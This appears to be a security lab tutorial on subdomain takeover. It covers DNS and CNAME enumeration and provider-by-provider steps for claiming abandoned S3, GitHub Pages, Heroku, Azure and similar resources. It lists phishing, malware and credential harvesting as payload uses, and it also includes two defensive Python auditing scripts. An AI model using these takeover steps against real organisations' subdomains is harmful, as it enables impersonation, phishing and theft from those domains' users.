Lab 1: Basic Subdomain Takeover

Basic subdomain takeover vulnerabilities

Difficulty: Low

Lab Overview

This lab demonstrates basic subdomain takeover vulnerabilities: a subdomain's DNS record (typically a CNAME) still points at an external service the organisation has stopped using, so whoever registers that service name receives the subdomain's traffic.

Objective: Understand how basic subdomain takeover attacks work and how to exploit them.

Subdomain Takeover Warning

This lab demonstrates subdomain takeover vulnerabilities caused by:

  • DNS Misconfiguration - Records pointing to services that no longer exist
  • Service Deletion - The external service was deleted but the DNS record was left in place
  • Weak Authentication - The external service does not authenticate who claims a given hostname
  • No Validation - The external service does not verify domain ownership before serving a custom subdomain
Test Subdomains

Try these test subdomains:

  • vulnerable.example.com - Vulnerable to takeover
  • secure.example.com - Properly secured
  • unknown.example.com - Unknown status
Basic Subdomain Takeover Techniques
DNS Enumeration
    # Enumerate subdomains
    # (many resolvers answer ANY minimally per RFC 8482; query A, AAAA, CNAME
    # individually if the ANY response is empty)
    dig @8.8.8.8 example.com ANY
    nslookup subdomain.example.com
    host subdomain.example.com
CNAME Check
    # Check CNAME records
    dig subdomain.example.com CNAME
    # Look for services like:
    # - *.s3.amazonaws.com
    # - *.herokuapp.com
    # - *.github.io
Service Verification
    # Check if service exists: status line from the headers,
    # then the body, since errors such as "NoSuchBucket" are in the
    # response body and curl -I (HEAD) never shows them
    curl -sI https://subdomain.example.com
    curl -s https://subdomain.example.com | head -c 500
    # Look for 404 errors or
    # "NoSuchBucket" errors
Takeover Confirmation
    # Confirm takeover
    # 1. Register service
    # 2. Point subdomain to service
    # 3. Verify control
    # 4. Host malicious content
Payload Delivery
    # Host malicious content
    # - Phishing pages
    # - Malware distribution
    # - Credential harvesting
    # - XSS payloads
Impact Assessment
    # Assess impact
    # - Brand reputation damage
    # - Credential theft
    # - Phishing attacks
    # - SEO manipulation
Vulnerability Details
  • Type: Basic Subdomain Takeover
  • Severity: Medium
  • Method: DNS misconfiguration
  • Issue: Service deletion without DNS cleanup
Attack Vectors
  • DNS Enumeration: Discover the organisation's subdomains
  • CNAME Check: Identify CNAME records that point to third-party services
  • Service Verification: Check whether the referenced service still exists
  • Takeover Confirmation: Confirm that the subdomain now serves attacker-controlled content
Basic Subdomain Takeover Examples

Use these techniques to exploit basic subdomain takeover vulnerabilities:

1. DNS Enumeration:
    # Enumerate subdomains
    dig @8.8.8.8 example.com ANY
    nslookup subdomain.example.com
    host subdomain.example.com
    # Use tools like:
    # - subfinder
    # - amass
    # - assetfinder
    # - findomain
2. CNAME Record Check:
    # Check CNAME records
    dig subdomain.example.com CNAME
    # Look for vulnerable services:
    # - *.s3.amazonaws.com
    # - *.herokuapp.com
    # - *.github.io
    # - *.netlify.app
    # - *.vercel.app
3. Service Verification:
    # Check if service exists: headers for the status code, body for the
    # provider's error text (curl -I sends HEAD and never shows the body)
    curl -sI https://subdomain.example.com
    curl -sI http://subdomain.example.com
    curl -s https://subdomain.example.com | head -c 500
    # Look for:
    # - 404 errors
    # - "NoSuchBucket" errors
    # - "NoSuchKey" errors
    # - "Not Found" errors
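The three steps above (and the DNS Enumeration, CNAME Check and Service Verification blocks in the Techniques section) are the same check a DNS owner should run against their own zone on a schedule. The following is an added example, not part of the lab: it walks a zone's CNAME records, keeps those pointing at the hosting services the lab lists, and reports a record as dangling when the target no longer resolves (NXDOMAIN) or the provider answers with an unclaimed-resource fingerprint such as S3's NoSuchBucket or a plain 404. DNS resolution and HTTP probing are injected as callables so the script runs offline here on constructed sample data; the zone, DNS answers and HTTP responses below are all made up for the example.

```python
"""Dangling-CNAME audit over a DNS zone export (added example, not the lab's code).

resolves(target) and probe(name) are injected so the audit runs offline; in
production pass a real resolver (e.g. dnspython) and HTTP client instead.
"""
import re
from dataclasses import dataclass
from typing import Callable, Optional

# Third-party hosting targets from the lab's CNAME-check step.  A CNAME to one
# of these is only a problem when the target is unclaimed, decided below.
TAKEOVER_PRONE_SERVICES = {
    "aws-s3": re.compile(r"\.s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com\.?$"),
    "heroku": re.compile(r"\.herokuapp\.com\.?$"),
    "github-pages": re.compile(r"\.github\.io\.?$"),
    "netlify": re.compile(r"\.netlify\.app\.?$"),
    "vercel": re.compile(r"\.vercel\.app\.?$"),
}

# Body strings meaning "the provider answered, but nobody owns this name".
# NoSuchBucket is the one the lab cites; add others per provider as verified.
UNCLAIMED_FINGERPRINTS = {
    "aws-s3": ("NoSuchBucket",),
}


@dataclass(frozen=True)
class CnameRecord:
    name: str      # the subdomain in our zone
    target: str    # where its CNAME points


@dataclass(frozen=True)
class Finding:
    name: str
    target: str
    service: str
    reason: str    # "nxdomain", "unclaimed-fingerprint" or "http-404"


def classify_target(target: str) -> Optional[str]:
    """Return the hosting service a CNAME target belongs to, or None."""
    for service, pattern in TAKEOVER_PRONE_SERVICES.items():
        if pattern.search(target.lower()):
            return service
    return None


def audit(records: list[CnameRecord],
          resolves: Callable[[str], bool],
          probe: Callable[[str], tuple[int, str]]) -> list[Finding]:
    """Flag CNAMEs whose third-party target is gone or unclaimed."""
    findings = []
    for rec in records:
        service = classify_target(rec.target)
        if service is None:
            continue  # first-party or unlisted target: outside this check
        if not resolves(rec.target):
            # Target name is gone entirely (e.g. a deleted Netlify site).
            findings.append(Finding(rec.name, rec.target, service, "nxdomain"))
            continue
        # Some providers resolve every name under their domain (any *.github.io
        # resolves), so NXDOMAIN alone is not enough: probe the subdomain.
        status, body = probe(rec.name)
        if any(fp in body for fp in UNCLAIMED_FINGERPRINTS.get(service, ())):
            findings.append(Finding(rec.name, rec.target, service, "unclaimed-fingerprint"))
        elif status == 404:
            findings.append(Finding(rec.name, rec.target, service, "http-404"))
    return findings


# --- constructed sample data (not real DNS answers or HTTP responses) -------
SAMPLE_ZONE = [
    CnameRecord("vulnerable.example.com", "vulnerable-assets.s3.amazonaws.com"),
    CnameRecord("secure.example.com", "example-prod.herokuapp.com"),
    CnameRecord("unknown.example.com", "old-docs.github.io"),
    CnameRecord("gone.example.com", "retired-site.netlify.app"),
    CnameRecord("www.example.com", "lb.internal.example.com"),
]
SAMPLE_DNS = {  # target -> does it resolve?
    "vulnerable-assets.s3.amazonaws.com": True,
    "example-prod.herokuapp.com": True,
    "old-docs.github.io": True,          # wildcard: resolves even if unclaimed
    "lb.internal.example.com": True,
    "retired-site.netlify.app": False,   # NXDOMAIN
}
SAMPLE_HTTP = {  # subdomain -> (status, body)
    "vulnerable.example.com": (404, "<Error><Code>NoSuchBucket</Code></Error>"),
    "secure.example.com": (200, "<html>welcome</html>"),
    "unknown.example.com": (404, "<html>404 Not Found</html>"),
}


def fake_resolves(target: str) -> bool:
    return SAMPLE_DNS.get(target, False)


def fake_probe(name: str) -> tuple[int, str]:
    return SAMPLE_HTTP.get(name, (0, ""))


def run_sample_audit() -> list[Finding]:
    return audit(SAMPLE_ZONE, fake_resolves, fake_probe)


if __name__ == "__main__":
    for f in run_sample_audit():
        print(f"{f.name} -> {f.target} [{f.service}] {f.reason}")
```

On the sample zone the audit reports three records: vulnerable.example.com (S3 fingerprint), unknown.example.com (GitHub Pages target resolves but serves 404) and gone.example.com (Netlify target is NXDOMAIN); secure.example.com is left alone because its Heroku app answers 200, and www.example.com is skipped because it points at a first-party host. A "http-404" finding is weaker evidence than a fingerprint match and should be confirmed by hand before the record is deleted.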
4. AWS S3 Bucket Takeover:
    # Check S3 bucket
    aws s3 ls s3://subdomain.example.com
    # If bucket doesn't exist:
    # 1. Create bucket with same name
    # 2. Upload malicious content
    # 3. Verify takeover
    # Example bucket creation:
    aws s3 mb s3://subdomain.example.com
    echo "Subdomain Takeover" > index.html
    aws s3 cp index.html s3://subdomain.example.com/
5. GitHub Pages Takeover:
    # Check GitHub Pages
    curl -I https://subdomain.example.com
    # If 404 error:
    # 1. Create GitHub repository
    # 2. Enable GitHub Pages
    # 3. Upload malicious content
    # 4. Verify takeover
    # Repository setup (<repository-url> is a placeholder for the new repo):
    git init
    echo "Subdomain Takeover" > index.html
    git add .
    git commit -m "Initial commit"
    git remote add origin <repository-url>
    git push origin main
6. Heroku App Takeover:
    # Check Heroku app
    curl -I https://subdomain.example.com
    # If 404 error:
    # 1. Create Heroku app
    # 2. Deploy malicious content
    # 3. Verify takeover
    # Heroku deployment (run inside an initialised git repository):
    heroku create subdomain-example-com
    echo "Subdomain Takeover" > index.html
    git add .
    git commit -m "Initial commit"
    git push heroku main
7. Netlify Takeover:
    # Check Netlify site
    curl -I https://subdomain.example.com
    # If 404 error:
    # 1. Create Netlify site
    # 2. Upload malicious content
    # 3. Verify takeover
    # Netlify deployment:
    netlify deploy --dir . --prod
    # Or drag and drop to Netlify dashboard
8. Vercel Takeover:
    # Check Vercel site
    curl -I https://subdomain.example.com
    # If 404 error:
    # 1. Create Vercel project
    # 2. Deploy malicious content
    # 3. Verify takeover
    # Vercel deployment:
    vercel --prod
    # Or connect GitHub repository
9. Firebase Hosting Takeover:
    # Check Firebase site
    curl -I https://subdomain.example.com
    # If 404 error:
    # 1. Create Firebase project
    # 2. Deploy malicious content
    # 3. Verify takeover
    # Firebase deployment:
    firebase init hosting
    firebase deploy
10. Azure Blob Storage Takeover:
    # Check Azure blob
    curl -I https://subdomain.example.com
    # If 404 error:
    # 1. Create Azure storage account
    # 2. Create blob container
    # 3. Upload malicious content
    # 4. Verify takeover
    # Azure CLI (<resource-group> is a placeholder). The static-website
    # container is literally named $web, so it must be single-quoted or the
    # shell expands it as an empty variable:
    az storage account create --name subdomainexamplecom --resource-group <resource-group>
    az storage container create --name '$web' --account-name subdomainexamplecom
    az storage blob upload --file index.html --container-name '$web' --account-name subdomainexamplecom
11. Google Cloud Storage Takeover:
    # Check GCS bucket
    curl -I https://subdomain.example.com
    # If 404 error:
    # 1. Create GCS bucket
    # 2. Upload malicious content
    # 3. Verify takeover
    # GCS CLI:
    gsutil mb gs://subdomain.example.com
    gsutil cp index.html gs://subdomain.example.com/
12. Cloudflare Pages Takeover:
    # Check Cloudflare Pages
    curl -I https://subdomain.example.com
    # If 404 error:
    # 1. Create Cloudflare Pages project
    # 2. Deploy malicious content
    # 3. Verify takeover
    # Cloudflare Pages deployment:
    # Upload files via dashboard or connect Git repository
13. Automated Takeover Detection:
    # Use automated tools
    # - subjack
    # - takeover
    # - subzy
    # - subdomain-takeover
    # Example with subjack:
    subjack -w subdomains.txt -t 100 -o results.txt
    # Example with takeover:
    takeover -l subdomains.txt -t 10
14. Manual Verification:
    # Manual verification steps
    # 1. Check DNS records
    # 2. Verify service existence
    # 3. Test for 404 errors
    # 4. Attempt service registration
    # 5. Confirm takeover
    # 6. Document findings
15. Impact Assessment:
    # Assess takeover impact
    # - Brand reputation damage
    # - Credential theft potential
    # - Phishing attack vectors
    # - SEO manipulation
    # - Trust and security implications
    # Document findings:
    # - Vulnerable subdomains
    # - Affected services
    # - Potential impact
    # - Remediation steps
Real-World Attack Scenarios
Mitigation Strategies
  • Regular DNS record auditing and cleanup
  • Implement proper subdomain monitoring
  • Use secure service configurations
  • Implement proper authentication and authorization
  • Regular security testing and vulnerability assessments
  • Monitor for unusual subdomain activity
  • Implement proper DNS security controls
  • Use secure coding practices
  • Implement proper error handling
  • Educate users about security threats
  • Use multi-factor authentication
  • Implement proper logging and monitoring
  • Use subdomain takeover detection tools
  • Implement proper audit trails
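The first mitigation, DNS record auditing and cleanup, is most effective when it runs before a service is deleted rather than after. The following is an added example, not part of the lab: a decommission gate that takes the zone's CNAME records and the external hostname about to disappear (a bucket, app or site) and lists every record that would be left dangling, following CNAME chains inside the zone so indirect pointers are caught. The sample zone is constructed for the example.

```python
"""Decommission gate for third-party hosting endpoints (added example).

The lab's root cause is "service deletion without DNS cleanup".  Run this
before deleting an external service: if any record in the zone still resolves
through to that endpoint, the deletion must wait until the record is removed
or repointed.  The zone data below is constructed, not a real export.
"""


def _canon(name: str) -> str:
    """Normalise a DNS name for comparison (case and trailing dot)."""
    return name.lower().rstrip(".")


def records_depending_on(cnames: list[tuple[str, str]], endpoint: str) -> list[str]:
    """Return the zone names whose CNAME chain ends at `endpoint`."""
    chain_map = {_canon(name): _canon(target) for name, target in cnames}
    end = _canon(endpoint)
    dependents = []
    for name in chain_map:
        seen = set()
        cur = name
        # Follow the chain while it stays inside our zone; stop on loops.
        while cur in chain_map and cur not in seen:
            seen.add(cur)
            cur = chain_map[cur]
        if cur == end:
            dependents.append(name)
    return sorted(dependents)


def safe_to_delete(cnames: list[tuple[str, str]], endpoint: str) -> bool:
    """True only when no record in the zone still points at the endpoint."""
    return not records_depending_on(cnames, endpoint)


# Constructed zone export (not a real zone).
SAMPLE_CNAMES = [
    ("assets.example.com", "vulnerable-assets.s3.amazonaws.com"),
    ("static.example.com", "assets.example.com"),          # indirect pointer
    ("app.example.com", "example-prod.herokuapp.com"),
    ("Docs.example.com.", "example-prod.herokuapp.com."),  # mixed case, trailing dot
]

if __name__ == "__main__":
    bucket = "vulnerable-assets.s3.amazonaws.com"
    blockers = records_depending_on(SAMPLE_CNAMES, bucket)
    if blockers:
        print(f"Do not delete {bucket} yet; remove or repoint: {', '.join(blockers)}")
    else:
        print(f"{bucket} has no dependent records; safe to delete")
```

Wire this into whatever process tears down cloud resources (a pipeline step or a pre-deletion hook) and feed it a fresh zone export each time, so the DNS record and the service it points at are always retired in that order.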